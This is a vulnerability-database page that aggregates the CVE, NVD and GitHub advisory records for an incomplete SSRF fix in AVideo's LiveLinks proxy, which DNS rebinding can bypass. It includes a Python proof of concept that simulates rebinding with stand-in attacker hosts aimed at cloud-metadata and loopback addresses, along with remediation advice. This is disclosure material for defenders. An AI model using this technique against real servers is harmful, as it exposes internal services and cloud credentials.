Vulnerability-Lookup

CVE-2026-41055 (GCVE-0-2026-41055)

Vulnerability from cvelistv5 – Published: 2026-04-21 22:25 – Updated: 2026-04-22 14:00

Title

AVideo has an incomplete fix for CVE-2026-33039 (SSRF)

Summary

WWBN AVideo is an open source video platform. In versions 29.0 and below, an incomplete SSRF fix in AVideo's LiveLinks proxy adds `isSSRFSafeURL()` validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints. Commit 8d8fc0cadb425835b4861036d589abcea4d78ee8 contains an updated fix.

Severity ?

8.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_MISC
	https://github.com/WWBN/AVideo/commit/0e56382921f…	x_refsource_MISC
	https://github.com/WWBN/AVideo/commit/8d8fc0cadb4…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: < 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-41055",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-22T14:00:09.342567Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-22T14:00:50.623Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions 29.0 and below, an incomplete SSRF fix in AVideo\u0027s LiveLinks proxy adds `isSSRFSafeURL()` validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints. Commit 8d8fc0cadb425835b4861036d589abcea4d78ee8 contains an updated fix."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-21T22:35:27.054Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp"
        },
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-9x67-f2v7-63rw",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-9x67-f2v7-63rw"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/8d8fc0cadb425835b4861036d589abcea4d78ee8",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/8d8fc0cadb425835b4861036d589abcea4d78ee8"
        }
      ],
      "source": {
        "advisory": "GHSA-793q-xgj6-7frp",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo has an incomplete fix for CVE-2026-33039 (SSRF)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-41055",
    "datePublished": "2026-04-21T22:25:45.488Z",
    "dateReserved": "2026-04-16T16:43:03.172Z",
    "dateUpdated": "2026-04-22T14:00:50.623Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-41055",
      "date": "2026-04-23",
      "epss": "0.00031",
      "percentile": "0.09048"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-41055\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-21T23:16:20.707\",\"lastModified\":\"2026-04-23T15:59:00.800\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions 29.0 and below, an incomplete SSRF fix in AVideo\u0027s LiveLinks proxy adds `isSSRFSafeURL()` validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints. Commit 8d8fc0cadb425835b4861036d589abcea4d78ee8 contains an updated fix.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"29.0\",\"matchCriteriaId\":\"AC38CA07-71C1-4C86-B84A-83CF96367CBA\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/commit/8d8fc0cadb425835b4861036d589abcea4d78ee8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-9x67-f2v7-63rw\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Not Applicable\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41055\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-22T14:00:09.342567Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-22T14:00:27.871Z\"}}], \"cna\": {\"title\": \"AVideo has an incomplete fix for CVE-2026-33039 (SSRF)\", \"source\": {\"advisory\": \"GHSA-793q-xgj6-7frp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 8.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-9x67-f2v7-63rw\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-9x67-f2v7-63rw\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917\", \"name\": \"https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/8d8fc0cadb425835b4861036d589abcea4d78ee8\", \"name\": \"https://github.com/WWBN/AVideo/commit/8d8fc0cadb425835b4861036d589abcea4d78ee8\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions 29.0 and below, an incomplete SSRF fix in AVideo\u0027s LiveLinks proxy adds `isSSRFSafeURL()` validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints. Commit 8d8fc0cadb425835b4861036d589abcea4d78ee8 contains an updated fix.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-21T22:35:27.054Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-41055\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-22T14:00:50.623Z\", \"dateReserved\": \"2026-04-16T16:43:03.172Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-21T22:25:45.488Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-41055

Vulnerability from fkie_nvd - Published: 2026-04-21 23:16 - Updated: 2026-04-23 15:59

Severity ?

8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917	Patch
security-advisories@github.com	https://github.com/WWBN/AVideo/commit/8d8fc0cadb425835b4861036d589abcea4d78ee8	Patch
security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp	Exploit, Mitigation, Vendor Advisory
security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-9x67-f2v7-63rw	Not Applicable
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC38CA07-71C1-4C86-B84A-83CF96367CBA",
              "versionEndIncluding": "29.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions 29.0 and below, an incomplete SSRF fix in AVideo\u0027s LiveLinks proxy adds `isSSRFSafeURL()` validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints. Commit 8d8fc0cadb425835b4861036d589abcea4d78ee8 contains an updated fix."
    }
  ],
  "id": "CVE-2026-41055",
  "lastModified": "2026-04-23T15:59:00.800",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-04-21T23:16:20.707",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/8d8fc0cadb425835b4861036d589abcea4d78ee8"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Not Applicable"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-9x67-f2v7-63rw"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-793Q-XGJ6-7FRP

Vulnerability from github – Published: 2026-04-14 23:15 – Updated: 2026-04-14 23:15

Summary

WWBN AVideo has an incomplete fix for CVE-2026-33039: SSRF

Details

Summary

The incomplete SSRF fix in AVideo's LiveLinks proxy adds isSSRFSafeURL() validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints.

Affected Package

Ecosystem: Other
Package: AVideo
Affected versions: < commit 0e56382921fc71e64829cd1ec35f04e338c70917
Patched versions: >= commit 0e56382921fc71e64829cd1ec35f04e338c70917

Details

The plugin/LiveLinks/proxy.php endpoint proxies live stream URLs. The fix adds isSSRFSafeURL() check on the initial URL, redirect URL validation, and follow_location=0 in the get_headers() context. However, multiple DNS TOCTOU vulnerabilities remain.

For the initial URL, isSSRFSafeURL() resolves DNS once for validation, but get_headers() resolves DNS again independently. A DNS rebinding attack with TTL=0 returns a safe external IP for the first resolution and an internal IP for the second.

The same TOCTOU exists for redirect URLs: isSSRFSafeURL() validates the redirect target (first resolution returns a safe IP), then fakeBrowser() makes the actual request (second resolution returns an internal IP).

Additionally, even with follow_location=0, get_headers() still sends an HTTP request that can probe internal services via DNS rebinding, and multiple Location headers in a response cause filter_var() to receive an array instead of a string, resulting in a fall-through to the else branch.

PoC

#!/usr/bin/env python3
"""
CVE-2026-33039 - AVideo LiveLinks Proxy SSRF via DNS Rebinding
"""

import re
import sys

class DNSResolver:
    def __init__(self):
        self._call_count = {}

    def resolve(self, host):
        if host not in self._call_count:
            self._call_count[host] = 0
        self._call_count[host] += 1

        if host == "rebind.attacker.com":
            return "93.184.216.34" if self._call_count[host] == 1 else "169.254.169.254"
        if host == "rebind-loopback.attacker.com":
            return "93.184.216.34" if self._call_count[host] == 1 else "127.0.0.1"

        static = {"attacker.com": "93.184.216.34", "example.com": "93.184.216.34", "localhost": "127.0.0.1"}
        return static.get(host, None)

    def reset(self):
        self._call_count = {}

dns = DNSResolver()

def php_parse_url_host(url):
    match = re.match(r'https?://([^/:?#]+)', url, re.IGNORECASE)
    return match.group(1).lower() if match else None

def php_filter_validate_ip(s):
    if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', s):
        return all(0 <= int(p) <= 255 for p in s.split('.'))
    return False

def is_ssrf_safe_url(url):
    if not url: return False, "empty"
    host = php_parse_url_host(url)
    if not host: return False, "no host"

    for pat in ['localhost', '127.0.0.1', '::1', '0.0.0.0']:
        if host == pat: return False, f"blocked: {host}"

    ip = host
    if not php_filter_validate_ip(host):
        resolved = dns.resolve(host)
        if not resolved: return False, "DNS failed"
        ip = resolved

    for pattern in [r'^10\.', r'^172\.(1[6-9]|2\d|3[0-1])\.', r'^192\.168\.', r'^127\.', r'^169\.254\.']:
        if re.match(pattern, ip): return False, f"blocked: {ip}"

    return True, f"allowed ({ip})"

def main():
    print("=" * 72)
    print("CVE-2026-33039 - AVideo LiveLinks Proxy SSRF PoC")
    print("=" * 72)

    vuln_count = 0

    print("\n[TEST 1] DNS rebinding on initial URL")
    dns.reset()
    safe, reason = is_ssrf_safe_url("http://rebind.attacker.com/meta-data/")
    actual_ip = dns.resolve("rebind.attacker.com")
    print(f"  isSSRFSafeURL: safe={safe}, reason={reason}")
    print(f"  Actual request goes to: {actual_ip}")
    if safe and actual_ip == "169.254.169.254":
        print("  => BYPASS!")
        vuln_count += 1

    print("\n[TEST 2] DNS rebinding on redirect URL")
    dns.reset()
    safe_r, _ = is_ssrf_safe_url("http://rebind-loopback.attacker.com/admin/")
    final_ip = dns.resolve("rebind-loopback.attacker.com")
    print(f"  isSSRFSafeURL: safe={safe_r}")
    print(f"  fakeBrowser() goes to: {final_ip}")
    if safe_r and final_ip == "127.0.0.1":
        print("  => BYPASS!")
        vuln_count += 1

    print("\n[TEST 3] get_headers() side-effect")
    dns.reset()
    safe, _ = is_ssrf_safe_url("http://rebind.attacker.com:8080/probe")
    side_ip = dns.resolve("rebind.attacker.com")
    print(f"  isSSRFSafeURL passed: {safe}")
    print(f"  get_headers() reached: {side_ip}")
    if safe and side_ip == "169.254.169.254":
        print("  => BYPASS!")
        vuln_count += 1

    print(f"\nBypass vectors: {vuln_count}")
    if vuln_count > 0:
        print("\nVULNERABILITY CONFIRMED")
        return 0
    return 1

if __name__ == "__main__":
    sys.exit(main())

Steps to reproduce: 1. Run python3 poc.py. 2. Observe that all three DNS rebinding bypass vectors succeed.

Expected output:

VULNERABILITY CONFIRMED
DNS TOCTOU bypass vectors succeed on initial URL, redirect URL, and get_headers() side-effect paths.

Impact

DNS rebinding allows an attacker to bypass SSRF validation and make the server send requests to internal services, cloud metadata endpoints, and other protected resources.

Suggested Remediation

Pin DNS resolution: resolve the hostname once, validate the IP, and use the resolved IP for the actual request via CURLOPT_RESOLVE or equivalent. Remove the get_headers() call. Block redirects entirely or re-validate using pinned DNS after each redirect.

Severity ?

5.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T23:15:43Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe incomplete SSRF fix in AVideo\u0027s LiveLinks proxy adds `isSSRFSafeURL()` validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints.\n\n### Affected Package\n\n- **Ecosystem:** Other\n- **Package:** AVideo\n- **Affected versions:** \u003c commit 0e56382921fc71e64829cd1ec35f04e338c70917\n- **Patched versions:** \u003e= commit 0e56382921fc71e64829cd1ec35f04e338c70917\n\n### Details\n\nThe `plugin/LiveLinks/proxy.php` endpoint proxies live stream URLs. The fix adds `isSSRFSafeURL()` check on the initial URL, redirect URL validation, and `follow_location=0` in the `get_headers()` context. However, multiple DNS TOCTOU vulnerabilities remain.\n\nFor the initial URL, `isSSRFSafeURL()` resolves DNS once for validation, but `get_headers()` resolves DNS again independently. A DNS rebinding attack with TTL=0 returns a safe external IP for the first resolution and an internal IP for the second.\n\nThe same TOCTOU exists for redirect URLs: `isSSRFSafeURL()` validates the redirect target (first resolution returns a safe IP), then `fakeBrowser()` makes the actual request (second resolution returns an internal IP).\n\nAdditionally, even with `follow_location=0`, `get_headers()` still sends an HTTP request that can probe internal services via DNS rebinding, and multiple `Location` headers in a response cause `filter_var()` to receive an array instead of a string, resulting in a fall-through to the else branch.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nCVE-2026-33039 - AVideo LiveLinks Proxy SSRF via DNS Rebinding\n\"\"\"\n\nimport re\nimport sys\n\nclass DNSResolver:\n    def __init__(self):\n        self._call_count = {}\n\n    def resolve(self, host):\n        if host not in self._call_count:\n            self._call_count[host] = 0\n        self._call_count[host] += 1\n\n        if host == \"rebind.attacker.com\":\n            return \"93.184.216.34\" if self._call_count[host] == 1 else \"169.254.169.254\"\n        if host == \"rebind-loopback.attacker.com\":\n            return \"93.184.216.34\" if self._call_count[host] == 1 else \"127.0.0.1\"\n\n        static = {\"attacker.com\": \"93.184.216.34\", \"example.com\": \"93.184.216.34\", \"localhost\": \"127.0.0.1\"}\n        return static.get(host, None)\n\n    def reset(self):\n        self._call_count = {}\n\ndns = DNSResolver()\n\ndef php_parse_url_host(url):\n    match = re.match(r\u0027https?://([^/:?#]+)\u0027, url, re.IGNORECASE)\n    return match.group(1).lower() if match else None\n\ndef php_filter_validate_ip(s):\n    if re.match(r\u0027^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\u0027, s):\n        return all(0 \u003c= int(p) \u003c= 255 for p in s.split(\u0027.\u0027))\n    return False\n\ndef is_ssrf_safe_url(url):\n    if not url: return False, \"empty\"\n    host = php_parse_url_host(url)\n    if not host: return False, \"no host\"\n\n    for pat in [\u0027localhost\u0027, \u0027127.0.0.1\u0027, \u0027::1\u0027, \u00270.0.0.0\u0027]:\n        if host == pat: return False, f\"blocked: {host}\"\n\n    ip = host\n    if not php_filter_validate_ip(host):\n        resolved = dns.resolve(host)\n        if not resolved: return False, \"DNS failed\"\n        ip = resolved\n\n    for pattern in [r\u0027^10\\.\u0027, r\u0027^172\\.(1[6-9]|2\\d|3[0-1])\\.\u0027, r\u0027^192\\.168\\.\u0027, r\u0027^127\\.\u0027, r\u0027^169\\.254\\.\u0027]:\n        if re.match(pattern, ip): return False, f\"blocked: {ip}\"\n\n    return True, f\"allowed ({ip})\"\n\ndef main():\n    print(\"=\" * 72)\n    print(\"CVE-2026-33039 - AVideo LiveLinks Proxy SSRF PoC\")\n    print(\"=\" * 72)\n\n    vuln_count = 0\n\n    print(\"\\n[TEST 1] DNS rebinding on initial URL\")\n    dns.reset()\n    safe, reason = is_ssrf_safe_url(\"http://rebind.attacker.com/meta-data/\")\n    actual_ip = dns.resolve(\"rebind.attacker.com\")\n    print(f\"  isSSRFSafeURL: safe={safe}, reason={reason}\")\n    print(f\"  Actual request goes to: {actual_ip}\")\n    if safe and actual_ip == \"169.254.169.254\":\n        print(\"  =\u003e BYPASS!\")\n        vuln_count += 1\n\n    print(\"\\n[TEST 2] DNS rebinding on redirect URL\")\n    dns.reset()\n    safe_r, _ = is_ssrf_safe_url(\"http://rebind-loopback.attacker.com/admin/\")\n    final_ip = dns.resolve(\"rebind-loopback.attacker.com\")\n    print(f\"  isSSRFSafeURL: safe={safe_r}\")\n    print(f\"  fakeBrowser() goes to: {final_ip}\")\n    if safe_r and final_ip == \"127.0.0.1\":\n        print(\"  =\u003e BYPASS!\")\n        vuln_count += 1\n\n    print(\"\\n[TEST 3] get_headers() side-effect\")\n    dns.reset()\n    safe, _ = is_ssrf_safe_url(\"http://rebind.attacker.com:8080/probe\")\n    side_ip = dns.resolve(\"rebind.attacker.com\")\n    print(f\"  isSSRFSafeURL passed: {safe}\")\n    print(f\"  get_headers() reached: {side_ip}\")\n    if safe and side_ip == \"169.254.169.254\":\n        print(\"  =\u003e BYPASS!\")\n        vuln_count += 1\n\n    print(f\"\\nBypass vectors: {vuln_count}\")\n    if vuln_count \u003e 0:\n        print(\"\\nVULNERABILITY CONFIRMED\")\n        return 0\n    return 1\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```\n\n**Steps to reproduce:**\n1. Run `python3 poc.py`.\n2. Observe that all three DNS rebinding bypass vectors succeed.\n\n**Expected output:**\n```\nVULNERABILITY CONFIRMED\nDNS TOCTOU bypass vectors succeed on initial URL, redirect URL, and get_headers() side-effect paths.\n```\n\n### Impact\n\nDNS rebinding allows an attacker to bypass SSRF validation and make the server send requests to internal services, cloud metadata endpoints, and other protected resources.\n\n### Suggested Remediation\n\nPin DNS resolution: resolve the hostname once, validate the IP, and use the resolved IP for the actual request via `CURLOPT_RESOLVE` or equivalent. Remove the `get_headers()` call. Block redirects entirely or re-validate using pinned DNS after each redirect.",
  "id": "GHSA-793q-xgj6-7frp",
  "modified": "2026-04-14T23:15:43Z",
  "published": "2026-04-14T23:15:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33039"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WWBN AVideo has an incomplete fix for CVE-2026-33039: SSRF"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

